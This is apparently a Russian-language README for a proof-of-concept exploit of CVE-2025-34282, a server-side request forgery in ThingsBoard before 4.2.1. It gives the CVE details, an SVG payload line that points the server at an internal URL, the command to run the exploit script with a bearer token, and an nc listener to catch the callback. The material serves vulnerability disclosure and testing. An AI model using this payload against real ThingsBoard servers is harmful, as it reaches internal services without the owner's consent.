
Эксплойт PoC для CVE-2025-34282 - ThingsBoard SSRF через загрузку SVG-изображения
Уязвимость подделки серверных запросов (SSRF) в IoT-платформе ThingsBoard версий до 4.2.1.
Злоумышленник с правами администратора тенанта может загрузить сфабрикованный SVG-файл, содержащий ссылку на внутренний URL, через галерею загрузки изображений. Когда ThingsBoard обрабатывает SVG на стороне сервера, он загружает указанный URL, что позволяет получить доступ к внутренним сервисам, не доступным из интернета.
| Поле | Детали |
|---|
| CVE | CVE-2025-34282 |
| Затронутая версия | < 4.2.1 |
| Исправленная версия | 4.2.1 |
| Оценка CVSS | 6.9 Средний |
| CWE | CWE-918 (Подделка серверных запросов) |
| Вендор | https://thingsboard.io |
POST /api/image
publicLink SVG через тег <object>
Полезная нагрузка ssrf_localhost_5555.svg встраивает ссылку на внутренний URL:
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />
При загрузке сервер ThingsBoard загружает http://127.0.0.1:5555, что подтверждает SSRF.
Требования:
pip install requests
Запуск:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>
Пример:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...
Запустите прослушиватель для перехвата SSRF-коллбэка перед выполнением эксплойта:
nc -l 5555
Tamil Mathi T.